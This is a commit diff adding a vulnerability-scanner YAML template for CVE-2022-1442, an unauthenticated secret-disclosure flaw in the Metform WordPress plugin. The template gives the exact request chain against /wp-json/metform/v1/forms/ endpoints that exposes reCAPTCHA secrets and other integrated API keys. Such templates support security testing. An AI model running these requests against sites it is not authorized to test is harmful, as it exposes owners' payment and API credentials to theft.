Added template for CVE-2022-1442

cves/2022/CVE-2022-1442.yaml

@@ -0,0 +1,52 @@
+id: CVE-2022-1442
+
+info:
+  name: WordPress Plugin Metform <= 2.1.3 - Unauthenticated Sensitive Information Disclosure
+  author: theamanrawat
+  severity: high
+  description: |
+    The Metform WordPress plugin is vulnerable to sensitive information disclosure due to improper access control in the ~/core/forms/action.php file which can be exploited by an unauthenticated attacker to view all API keys and secrets of integrated third-party APIs like that of PayPal, Stripe, Mailchimp, Hubspot, HelpScout, reCAPTCHA and many more, in versions up to and including 2.1.3.
+  reference:
+    - https://gist.github.com/Xib3rR4dAr/6e6c6e5fa1f8818058c7f03de1eda6bf
+    - https://wordpress.org/plugins/metform/advanced/
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-1442
+  tags: cve,cve2022,information-disclosure,wpscan,wordpress,wp-plugin,wp,metform,unauth
+
+requests:
+  - raw:
+      - |
+        GET /wp-json/metform/v1/forms/templates/0 HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        GET /wp-json/metform/v1/forms/get/{{id}} HTTP/1.1
+        Host: {{Hostname}}
+
+    req-condition: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "mf_recaptcha_secret_key"
+          - "mf_recaptcha_site_key"
+          - "mf_recaptcha_site_key_v3"
+          - "admin_email_from"
+        condition: and
+
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        part: header
+        words:
+          - "application/json"
+
+    extractors:
+      - type: regex
+        name: id
+        group: 1
+        regex:
+          - '<option value=\"([0-9]+)\"'
+        internal: true